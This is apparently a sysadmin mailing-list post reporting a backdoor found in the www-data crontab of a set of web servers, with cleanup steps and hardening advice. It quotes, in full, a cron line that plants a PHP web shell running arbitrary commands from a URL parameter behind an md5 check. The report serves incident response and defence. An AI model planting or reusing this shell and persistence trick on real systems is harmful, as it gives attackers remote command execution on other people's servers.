[Systems] Found a backdoor

[Bernie Innocenti]

While I was looking for cronjobs in /var/spool/cron/crontabs/, i found
that www-data was executing commands like these:

*/27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==
"6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
@system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php

Did you spot the system()? This executes arbitrary commands specified
via the "localtime" url parameter. Uh-oh.

There were about a dozen lines like the above, installing .cache.php in
various virtualhosts. I kept a copy of the file in
/root/www-data.backdoor. The file was last written on Jun 23  2015,
which may correlate with the switch to the new website.

I cleared the mess and searched the logs for requests containing
"localtime", but couldn't find any. I wonder if they could filter the
logs, since they were previously writable by www-data.

Please watch out. We should ensure directories accessible over http are
not writable by user www-data, especially those in which PHP and CGIs
are enabled.

Running several large sites under the same uid has always been a bad
security practice, and looking forward we should keep migrating them to
properly isolated containers.

Finally, Wordpress is particularly dangerous and we should update and
harden all instances. Can someone please take care of this? I'll do
Mediawiki, which I know pretty well.

-- 
 _ // Bernie Innocenti
 \X/  http://codewiz.org